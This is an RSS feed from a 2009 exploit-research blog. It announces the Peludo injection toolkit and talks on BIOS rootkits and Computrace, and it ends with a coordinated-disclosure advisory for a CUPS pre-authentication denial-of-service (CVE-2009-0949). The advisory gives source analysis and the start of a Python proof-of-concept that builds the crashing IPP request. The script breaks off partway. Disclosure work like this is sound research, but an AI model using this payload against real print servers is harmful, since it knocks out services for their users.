<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Exploiting Stuff.</title>
	<atom:link href="http://exploiting.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://exploiting.wordpress.com</link>
	<description>Reverse Engineering, Assembly, Exploit writing, Rootkits, Debuggers, Tools, Code Snippets, and more.</description>
	<lastBuildDate>Mon, 28 Dec 2009 21:57:19 +0000</lastBuildDate>
	<generator>http://wordpress.com/</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<cloud domain='exploiting.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://www.gravatar.com/blavatar/c087b48b83a6bfe91f199b4640a87fcf?s=96&#038;d=http://s.wordpress.com/i/buttonw-com.png</url>
		<title>Exploiting Stuff.</title>
		<link>http://exploiting.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://exploiting.wordpress.com/osd.xml" title="Exploiting Stuff." />
		<item>
		<title>Peludo &#8220;Cachicamo&#8221; Beta 1.0 is finally out!</title>
		<link>http://exploiting.wordpress.com/2009/12/25/peludo-cachicamo-beta-1-0-is-finally-out/</link>
		<comments>http://exploiting.wordpress.com/2009/12/25/peludo-cachicamo-beta-1-0-is-finally-out/#comments</comments>
		<pubDate>Fri, 25 Dec 2009 18:27:18 +0000</pubDate>
		<dc:creator>aLS --</dc:creator>
				<category><![CDATA[Main()]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[Netifera]]></category>
		<category><![CDATA[Peludo]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://exploiting.wordpress.com/?p=167</guid>
		<description><![CDATA[the_excerpt()<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=exploiting.wordpress.com&blog=758918&post=167&subd=exploiting&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><div id="attachment_169" class="wp-caption aligncenter" style="width: 336px"><a href="http://netifera.com"><img class="size-full wp-image-169" title="Netifera" src="http://exploiting.files.wordpress.com/2009/12/imgp.jpg?w=326&#038;h=320" alt="" width="326" height="320" /></a><p class="wp-caption-text">Peludo</p></div>
<p style="text-align:center;">
<p>Oh yeah!. Have you heard about Peludo from the Netifera guys?</p>
<p>You should. From the netifera&#8217;s page:</p>
<p><em>&#8220;</em><em>Peludo is a system to create and run platform independent, self-contained and injectable applications written in the C programming language. It provides a cross compiling environment with the tools to generate applications in Peludo&#8217;s new binary format (PLD). The system also provides the runtime necessary to launch these programs as independent executable files or as position independent code that can be injected into a runnning process. Peludo makes the netifera probe&#8217;s Java virtual machine injectable and easier to port to new platforms.&#8221;</em></p>
<p><span id="more-167"></span><br />
This is just a beta release. By now it only supports Linux/x86 and FreeBSD/amd64 as host and Linux/i386 as target platform but you can bet the Netifera guys are gonna extend this in nothing.</p>
<p>Inside Peludo&#8217;s tgz you will find a very complete documentation about what Peludo is and how it works together with a fully commented source code and very clear use instructions.</p>
<p>You can download it <a href="http://netifera.com/peludo" target="_blank">here</a>.</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/exploiting.wordpress.com/167/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/exploiting.wordpress.com/167/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/exploiting.wordpress.com/167/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/exploiting.wordpress.com/167/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/exploiting.wordpress.com/167/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/exploiting.wordpress.com/167/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/exploiting.wordpress.com/167/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/exploiting.wordpress.com/167/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/exploiting.wordpress.com/167/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/exploiting.wordpress.com/167/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=exploiting.wordpress.com&blog=758918&post=167&subd=exploiting&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://exploiting.wordpress.com/2009/12/25/peludo-cachicamo-beta-1-0-is-finally-out/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d5e963b441a73812620a82d6b092fc46?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">aLS</media:title>
		</media:content>

		<media:content url="http://exploiting.files.wordpress.com/2009/12/imgp.jpg" medium="image">
			<media:title type="html">Netifera</media:title>
		</media:content>
	</item>
		<item>
		<title>Ekoparty 2009 &#8211; Deactivate the Rootkit &#8211; 2 days left.</title>
		<link>http://exploiting.wordpress.com/2009/09/15/ekoparty-2009-2-days-left/</link>
		<comments>http://exploiting.wordpress.com/2009/09/15/ekoparty-2009-2-days-left/#comments</comments>
		<pubDate>Tue, 15 Sep 2009 17:12:30 +0000</pubDate>
		<dc:creator>aLS --</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Absolute]]></category>
		<category><![CDATA[anti theft]]></category>
		<category><![CDATA[BIOS]]></category>
		<category><![CDATA[Computrace]]></category>
		<category><![CDATA[Ekoparty]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[Rootkit]]></category>

		<guid isPermaLink="false">http://exploiting.wordpress.com/?p=152</guid>
		<description><![CDATA[Well&#8230; everybody knows Ekoparty. One of the most important Security Conferences at south america.  And a very important event in the local scene.
Of course, Alfred and I will be talking there. This&#8217;ll be a great opportunity for us to show all the PoC that we left out (coz of the Turbo Talk) in the past [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=exploiting.wordpress.com&blog=758918&post=152&subd=exploiting&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><div id="attachment_153" class="wp-caption aligncenter" style="width: 208px"><a href="http://www.ekoparty.com.ar/"><img class="size-full wp-image-153" title="ekologo" src="http://exploiting.files.wordpress.com/2009/09/ekologo.jpg?w=198&#038;h=185" alt="Ekoparty Security Conference" width="198" height="185" /></a><p class="wp-caption-text">Ekoparty Security Conference</p></div>
<p>Well&#8230; everybody knows Ekoparty. One of the most important Security Conferences at south america.  And a very important event in the local scene.</p>
<p>Of course, Alfred and I will be talking there. This&#8217;ll be a great opportunity for us to show all the PoC that we left out (coz of the Turbo Talk) in the past Black Hat &#8211; Las Vegas.</p>
<p>So, i hope you be there.</p>
<p>If you wanna share a beer (or two) and chat a bit.  Please drop me a msg.</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/exploiting.wordpress.com/152/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/exploiting.wordpress.com/152/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/exploiting.wordpress.com/152/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/exploiting.wordpress.com/152/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/exploiting.wordpress.com/152/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/exploiting.wordpress.com/152/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/exploiting.wordpress.com/152/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/exploiting.wordpress.com/152/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/exploiting.wordpress.com/152/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/exploiting.wordpress.com/152/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=exploiting.wordpress.com&blog=758918&post=152&subd=exploiting&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://exploiting.wordpress.com/2009/09/15/ekoparty-2009-2-days-left/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d5e963b441a73812620a82d6b092fc46?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">aLS</media:title>
		</media:content>

		<media:content url="http://exploiting.files.wordpress.com/2009/09/ekologo.jpg" medium="image">
			<media:title type="html">ekologo</media:title>
		</media:content>
	</item>
		<item>
		<title>Deactivate the rootkit &#8211; Black Hat Vegas 2009</title>
		<link>http://exploiting.wordpress.com/2009/09/11/138/</link>
		<comments>http://exploiting.wordpress.com/2009/09/11/138/#comments</comments>
		<pubDate>Fri, 11 Sep 2009 21:30:26 +0000</pubDate>
		<dc:creator>aLS --</dc:creator>
				<category><![CDATA[Main()]]></category>
		<category><![CDATA[Absolute]]></category>
		<category><![CDATA[BIOS]]></category>
		<category><![CDATA[Computrace]]></category>
		<category><![CDATA[Lo-Jack]]></category>
		<category><![CDATA[LoJack]]></category>
		<category><![CDATA[Ortega]]></category>
		<category><![CDATA[Rootkit]]></category>
		<category><![CDATA[Sacco]]></category>

		<guid isPermaLink="false">http://exploiting.wordpress.com/?p=138</guid>
		<description><![CDATA[the_excerpt()<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=exploiting.wordpress.com&blog=758918&post=138&subd=exploiting&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><div id="attachment_137" class="wp-caption aligncenter" style="width: 507px"><a rel="attachment wp-att-137" href="http://exploiting.wordpress.com/2009/09/11/138/blackhat/"><img class="size-full wp-image-137" title="BlackHat 2009 - Vegas" src="http://exploiting.files.wordpress.com/2009/09/blackhat.jpg?w=497&#038;h=311" alt="BlackHat 2009 - Vegas" width="497" height="311" /></a><p class="wp-caption-text">BlackHat 2009 - Vegas</p></div>
<p>Has been a long time since my last post here&#8230; Alfred and I were working very hard for our last research/talk (the continuation of &#8216;Persistant BIOS Infection&#8217;) &#8220;Deactivate the rootkit&#8221; where we found that Computrace  (an Anti-Theft Technology system) comes by default on most of the laptops BIOSes and it can be controlled by an attacker compromising the whole system&#8217;s security mechanisms.</p>
<p>Im not going to explain all the research here&#8230; a lot has been said about this. We just did a turbo-talk at black hat ( a very long one, im really happy about that) and we didnt have the time to show all the proofs we gathered but we did it through Core. Here is all the stuff. Draw Your Own Conclusions</p>
<p><a href="http://www.blackhat.com/presentations/bh-usa-09/ORTEGA/BHUSA09-Ortega-DeactivateRootkit-PAPER.pdf">Slides: Black Hat &#8211; Las Vegas 2009</a></p>
<p><a href="http://www.blackhat.com/presentations/bh-usa-09/ORTEGA/BHUSA09-Ortega-DeactivateRootkit-PAPER.pdf">White Paper : Black Hat &#8211; Las Vegas 2009</a></p>
<p><span id="more-138"></span></p>
<p>Then, after some words of the computrace guys denying almost all our findings (<a href="http://www.vancouversun.com/entertainment/Absolute+Software+denies+claims+hackers+exploit+software+commit+crime/1850869/story.html">here</a>), we made public this page with all the proof, meaning: a tool to detect if your laptop has computrace in it, a network dump showing the first stage of the communication in plain text :S, several videos demonstrating what we said, and a tool to control and redirect computrace.</p>
<p>You can find the Core Security response <a href="http://blog.coresecurity.com/2009/08/11/the-bios-embedded-anti-theft-persistant-agent-that-couldnt-response-handling-the-ostrich-defense/">here</a>:</p>
<p>and the Core&#8217;s project page <a href="http://corelabs.coresecurity.com/index.php?module=Wiki&amp;action=view&amp;type=publication&amp;name=Deactivate_the_Rootkit">here</a>.</p>
<p>A few pages who covered the talk:</p>
<p><a href="http://it.slashdot.org/story/09/07/31/1337202/BIOS-Rootkit-Preloaded-In-60-of-New-Laptops">Slashdot</a></p>
<p><a href="http://blogs.zdnet.com/security/?p=3936">ZDNet</a></p>
<p><a href="http://www.securityfocus.com/bid/35889/discuss">SecurityFocus</a></p>
<p><a href="http://www.reddit.com/r/netsec/duplicates/96dq0/researchers_find_insecure_bios_rootkit_preloaded/">Reddit</a></p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/exploiting.wordpress.com/138/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/exploiting.wordpress.com/138/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/exploiting.wordpress.com/138/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/exploiting.wordpress.com/138/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/exploiting.wordpress.com/138/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/exploiting.wordpress.com/138/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/exploiting.wordpress.com/138/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/exploiting.wordpress.com/138/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/exploiting.wordpress.com/138/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/exploiting.wordpress.com/138/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=exploiting.wordpress.com&blog=758918&post=138&subd=exploiting&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://exploiting.wordpress.com/2009/09/11/138/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d5e963b441a73812620a82d6b092fc46?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">aLS</media:title>
		</media:content>

		<media:content url="http://exploiting.files.wordpress.com/2009/09/blackhat.jpg" medium="image">
			<media:title type="html">BlackHat 2009 - Vegas</media:title>
		</media:content>
	</item>
		<item>
		<title>Persistent BIOS Infection at SyScan 2009</title>
		<link>http://exploiting.wordpress.com/2009/06/26/persistant-bios-infection-at-syscan-2009/</link>
		<comments>http://exploiting.wordpress.com/2009/06/26/persistant-bios-infection-at-syscan-2009/#comments</comments>
		<pubDate>Fri, 26 Jun 2009 16:45:38 +0000</pubDate>
		<dc:creator>aLS --</dc:creator>
				<category><![CDATA[Main()]]></category>
		<category><![CDATA[BIOS]]></category>
		<category><![CDATA[bios rootkit]]></category>
		<category><![CDATA[persistent bios infeccion]]></category>
		<category><![CDATA[singapore]]></category>
		<category><![CDATA[syscan]]></category>

		<guid isPermaLink="false">http://exploiting.wordpress.com/?p=124</guid>
		<description><![CDATA[Alfred and I we&#8217;ll be giving our talk &#8220;Persistent BIOS Infection&#8221; at SyScan &#8216;09, Singapore.  This time with some added content and of course, with our multiple cOOl demos, including the one with the dismembered real box (i hope  not to have problems when traveling with the hardware).
If someone wants to meet and go out [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=exploiting.wordpress.com&blog=758918&post=124&subd=exploiting&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><div id="attachment_130" class="wp-caption aligncenter" style="width: 506px"><a rel="attachment wp-att-130" href="http://exploiting.wordpress.com/2009/06/26/persistant-bios-infection-at-syscan-2009/syscan-3/"><img class="size-full wp-image-130" title="SyScan" src="http://exploiting.files.wordpress.com/2009/06/syscan2.gif?w=496&#038;h=158" alt="SyScan" width="496" height="158" /></a><p class="wp-caption-text">SyScan</p></div>
<p>Alfred and I we&#8217;ll be giving our talk &#8220;Persistent BIOS Infection&#8221; at SyScan &#8216;09, Singapore.  This time with some added content and of course, with our multiple cOOl demos, including the one with the dismembered real box (i hope  not to have problems when traveling with the hardware).</p>
<p>If someone wants to meet and go out for a beer or something i&#8217;ll be glad. Just drop me some line here or at als.alsx@gmail.com</p>
<p>c ya there!</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/exploiting.wordpress.com/124/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/exploiting.wordpress.com/124/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/exploiting.wordpress.com/124/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/exploiting.wordpress.com/124/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/exploiting.wordpress.com/124/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/exploiting.wordpress.com/124/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/exploiting.wordpress.com/124/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/exploiting.wordpress.com/124/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/exploiting.wordpress.com/124/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/exploiting.wordpress.com/124/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=exploiting.wordpress.com&blog=758918&post=124&subd=exploiting&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://exploiting.wordpress.com/2009/06/26/persistant-bios-infection-at-syscan-2009/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d5e963b441a73812620a82d6b092fc46?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">aLS</media:title>
		</media:content>

		<media:content url="http://exploiting.files.wordpress.com/2009/06/syscan2.gif" medium="image">
			<media:title type="html">SyScan</media:title>
		</media:content>
	</item>
		<item>
		<title>Our paper &#8216;Persistent BIOS Infection&#8217; has been released&#8230; on Phrack!</title>
		<link>http://exploiting.wordpress.com/2009/06/11/our-paper-persistent-bios-infection-has-been-released-on-phrack/</link>
		<comments>http://exploiting.wordpress.com/2009/06/11/our-paper-persistent-bios-infection-has-been-released-on-phrack/#comments</comments>
		<pubDate>Thu, 11 Jun 2009 16:32:43 +0000</pubDate>
		<dc:creator>aLS --</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://exploiting.wordpress.com/?p=114</guid>
		<description><![CDATA[the_excerpt()<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=exploiting.wordpress.com&blog=758918&post=114&subd=exploiting&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p><a href="www.phrack.org"><img class="aligncenter" title="PHRACK" src="http://www.cultdeadcow.com/news/images/phrack.jpg" alt="" width="494" height="158" /></a></p>
<p>We finally did it.  Our paper is out, and the phrack #66 is the best place i can imagine to release it.  We had to run a lot this last days for getting the paper ready on time. I would like to thank  the whole Phrack team for putting together the outstanding issue that you can read right<span style="font-family:Verdana,Arial,Helvetica,sans-serif;font-size:x-small;"> <a title="Phrack.org" href="http://www.phrack.org/" target="_self">here</a>.</span></p>
<p><span id="more-114"></span></p>
<p>I grew up reading this ezine and it has been kindof inspiration for me all this years so&#8230; its really exciting to be there.</p>
<p>Hope you like the paper, we&#8217;ve put in it almost all the notes we taked in those two weeks, together with the PoC shellcodes and the tools we used. You can see it <a title="Persistent BIOS Infection - PHRACK" href="http://www.phrack.org/issues.html?issue=66&amp;id=7#article" target="_blank">here</a>.</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/exploiting.wordpress.com/114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/exploiting.wordpress.com/114/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/exploiting.wordpress.com/114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/exploiting.wordpress.com/114/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/exploiting.wordpress.com/114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/exploiting.wordpress.com/114/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/exploiting.wordpress.com/114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/exploiting.wordpress.com/114/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/exploiting.wordpress.com/114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/exploiting.wordpress.com/114/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=exploiting.wordpress.com&blog=758918&post=114&subd=exploiting&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://exploiting.wordpress.com/2009/06/11/our-paper-persistent-bios-infection-has-been-released-on-phrack/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d5e963b441a73812620a82d6b092fc46?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">aLS</media:title>
		</media:content>

		<media:content url="http://www.cultdeadcow.com/news/images/phrack.jpg" medium="image">
			<media:title type="html">PHRACK</media:title>
		</media:content>
	</item>
		<item>
		<title>Apple CUPS IPP_TAG_UNSUPPORTED Handling null pointer Vulnerability</title>
		<link>http://exploiting.wordpress.com/2009/06/03/apple-cups-ipp_tag_unsupported-handling-null-pointer-vulnerability/</link>
		<comments>http://exploiting.wordpress.com/2009/06/03/apple-cups-ipp_tag_unsupported-handling-null-pointer-vulnerability/#comments</comments>
		<pubDate>Wed, 03 Jun 2009 16:59:34 +0000</pubDate>
		<dc:creator>aLS --</dc:creator>
				<category><![CDATA[Advisories]]></category>
		<category><![CDATA[Apple CUPS]]></category>
		<category><![CDATA[Core Security]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[PoC]]></category>
		<category><![CDATA[pre authentication]]></category>
		<category><![CDATA[Vulnerability]]></category>

		<guid isPermaLink="false">http://exploiting.wordpress.com/?p=103</guid>
		<description><![CDATA[the_excerpt()<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=exploiting.wordpress.com&blog=758918&post=103&subd=exploiting&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p><a rel="attachment wp-att-104" href="http://exploiting.wordpress.com/2009/06/03/apple-cups-ipp_tag_unsupported-handling-null-pointer-vulnerability/applecups/"><img class="aligncenter size-full wp-image-104" title="AppleCups" src="http://exploiting.files.wordpress.com/2009/06/applecups.jpg?w=200&#038;h=160" alt="AppleCups" width="200" height="160" /></a></p>
<p>Poor little CUPS&#8230; I feel bad for him.<br />
I swear, i wasn&#8217;t looking for bugs in it (not for *new* bugs at least <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> ). It just crashed in my face&#8230;</p>
<p>At the beginning i didn&#8217;t give so much importance to it but <em> </em>CUPS is shipped as the default printing service for OS X and almost all Linux distributions. Besides, it&#8217;s a pre-auth vulnerability so&#8230; i think it was worth to release an advisory for it  &#8211; with the appropiated PoC and technical info, as usual -</p>
<p>So, here you have it.  have phun. :p</p>
<p><span id="more-103"></span></p>
<pre>Apple CUPS IPP_TAG_UNSUPPORTED Handling null pointer Vulnerability

1. <strong><span>*</span>Advisory Information<span>*</span></strong>

Title: Apple CUPS IPP_TAG_UNSUPPORTED Handling null pointer Vulnerability

Advisory ID: CORE-2009-0420
Advisory URL:
<a href="http://www.coresecurity.com/content/AppleCUPS-null-pointer-vulnerability">http://www.coresecurity.com/content/AppleCUPS-null-pointer-vulnerability</a>
Date published: 2009-06-02
Date of last update: 2009-06-01
Vendors contacted: Apple Computer Inc.
Release mode: Coordinated release

2. <strong><span>*</span>Vulnerability Information<span>*</span></strong>

Class: Denial of service (DoS)
Remotely Exploitable: Yes
Locally Exploitable: Yes
Bugtraq ID: 35169
CVE Name: CVE-2009-0949

3. <strong><span>*</span>Vulnerability Description<span>*</span></strong>

CUPS [1] provides a portable printing layer for UNIX based operating
systems. It was developed by Easy Software Products and it is now owned
and maintained by Apple Computer Inc. to promote a standard printing
solution. It is the standard open source printing system for Mac OS X
and other UNIX-like operating systems.

A flaw has been identified in CUPS, when handling the
'IPP_TAG_UNSUPPORTED' tag, which could be exploited by attackers to
cause a remote pre-authentication denial of service.

4. <strong><span>*</span>Vulnerable packages<span>*</span></strong>

   . CUPS 1.1.17
   . CUPS 1.1.23
   . CUPS 1.3.6
   . CUPS 1.3.7
   . CUPS 1.3.8
   . CUPS 1.3.9
   . Earlier versions may also be affected, but were not checked.

5. <strong><span>*</span>Non-vulnerable packages<span>*</span></strong>

   . CUPS 1.3.10

6. <strong><span>*</span>Vendor Information, Solutions and Workarounds<span>*</span></strong>

This flaw was fixed in Mac OS X 10.5.7 by updating CUPS to 1.3.10. Apple
team intends to fix it on Mac OS X 10.4 in a future update. All CUPS
users should upgrade the software to 1.3.10.

7. <strong><span>*</span>Credits<span>*</span></strong>

This vulnerability was discovered and researched by Anibal Sacco from
the CORE IMPACT Exploit Writing Team (EWT) at Core Security Technologies.

8. <strong><span>*</span>Technical Description / Proof of Concept Code<span>*</span></strong>

This vulnerability identified in CUPS is caused by a bad 'ip' structure
initialization in the function 'ippReadIO()', located in 'cups/ipp.c',
when processing a specially crafted IPP (Internet Printing Protocol)
with two consecutives 'IPP_TAG_UNSUPPORTED' tags. This flaw could be
exploited by attackers to crash the affected application.

At 'ipp.c' the function 'ippReadIO()' is in charge of the initialization
of the 'ipp' structure, that represent the different tags of the current
IPP request packet.

/-----------

1016 ipp_state_t                     /* O - Current state */
1017 ippReadIO(void        *src,     /* I - Data source */
1018           ipp_iocb_t  cb,       /* I - Read callback function */
1019           int         blocking, /* I - Use blocking IO? */
1020           ipp_t       *parent,  /* I - Parent request, if any */
1021           ipp_t       *ipp)     /* I - IPP data */
1022 {
1023   int       n;                  /* Length of data */
1024   unsigned  char buffer[IPP_MAX_LENGTH + 1],
1025                                 /* Data buffer */
1026   string[IPP_MAX_NAME],
1027                                 /* Small string buffer */
1028  *bufptr;                       /* Pointer into buffer */
1029  ipp_attribute_t	*attr;         /* Current attribute */
1030  ipp_tag_t       tag;           /* Current tag */
1031  ipp_tag_t       value_tag;     /* Current value tag */
1032  ipp_value_t     *value;        /* Current value */

1035  DEBUG_printf(("ippReadIO(%p, %p, %d, %p, %p)\n", src, cb, blocking,
1036                parent, ipp));
1037  DEBUG_printf(("ippReadIO: ipp-&gt;state=%d\n", ipp-&gt;state));

1039  if (src == NULL || ipp == NULL)
1040    return (IPP_ERROR);
1041
1042  switch (ipp-&gt;state)
1043  {
1044    case IPP_IDLE :
1045        ipp-&gt;state ++; /* Avoid common problem... */
1046
1047    case IPP_HEADER :
1048        if (parent == NULL)

- -----------/

 As we can see in the code above, the packets can count with a few
different tag attributes.

When an 'IPP' packet is sent with a tag attribute lower than 0x10, it is
considered by CUPS as an 'IPP_TAG_UNSUPPORTED' tag:

/-----------

else if (tag &lt; IPP_TAG_UNSUPPORTED_VALUE)
{
    /*
    * Group tag...  Set the current group and continue...
    */
    if (ipp-&gt;curtag == tag)
        ipp-&gt;prev = ippAddSeparator(ipp);
    else if (ipp-&gt;current)
        ipp-&gt;prev = ipp-&gt;current;

    ipp-&gt;curtag  = tag;
    ipp-&gt;current = NULL;
    DEBUG_printf(("ippReadIO: group tag = %x, ipp-&gt;prev=%p\n", tag,
ipp-&gt;prev));
    continue;
}

- -----------/

 Because of the way that CUPS handles this kind of tags, if a packet
contains two consecutives 'IPP_TAG_UNSUPPORTED', the last node of the
IPP structure will be initialized as 'NULL'.

This will lead to a crash when the 'cupsdProcessIPPRequest' function
tries to read the 'name' field of the 'attr' structure.

/-----------

/*
 * 'cupsdProcessIPPRequest()' - Process an incoming IPP request.
 */
int                                           /* O - 1 on success, 0 on
failure */
cupsdProcessIPPRequest( cupsd_client_t *con)  /* I - Client connection */

...
    if (!attr)
    {
        /*
        * Then make sure that the first three attributes are:
        *
        *     attributes-charset
        *     attributes-natural-language
        *     printer-uri/job-uri
        */

        attr = con-&gt;request-&gt;attrs;
        if (attr &amp;&amp; !strcmp(attr-&gt;name, "attributes-charset") &amp;&amp;
(attr-&gt;value_tag &amp; IPP_TAG_MASK) == IPP_TAG_CHARSET)
	         charset = attr;
        else
	         charset = NULL;
...

- -----------/

8.1. <strong><span>*</span>Proof of Concept<span>*</span></strong>

The following Python script is the proof of concept written by Anibal
Sacco to trigger the vulnerability.

/-----------

from struct import pack
import sys
import socket

class IppRequest:
    """
    Little class to implement a basic Internet Printing Protocol
    """
    def __init__(self, host, port, printers, hpgl_data="a"):
        self.printers = printers
        self.host = host
        self.port = port
        self.hpgl_data = hpgl_data
        self.get_ipp_request()

    def attribute(self, tag, name, value):
        data =  pack('&gt;B',tag)
        data += pack('&gt;H',len(name))
        data += name
        data += pack('&gt;H',len(value))
        data += value
        return data

    def get_http_request(self):
        http_request = "POST <em><span>/</span>printers<span>/</span></em>%s HTTP/1.1\r\n" % self.printers
        http_request += "Content-Type: application/ipp\r\n"
        http_request += "User-Agent: Internet Print Provider\r\n"
        http_request += "Host: %s\r\n" % self.host
        http_request += "Content-Length: %d\r\n" % len(self.ipp_data)
        http_request += "Connection: Keep-Alive\r\n"
        http_request += "Cache-Control: no-cache\r\n"
        return http_request

    def get_ipp_request(self):
        operation_attr =  self.attribute(0x47, 'attributes-charset',
'utf-8')
        operation_attr += self.attribute(0x48,
'attributes-natural-language', 'en-us')
        operation_attr += self.attribute(0x45, 'printer-uri',
<a href="http://%s/printers/%s">"http://%s:%s/printers/%s"</a> % (self.host, self.port, self.printers))
        operation_attr += self.attribute(0x42, 'job-name', 'foo barrrrrrrr')
        operation_attr += self.attribute(0x42, 'document-format',
'application/vnd.hp-HPGL')

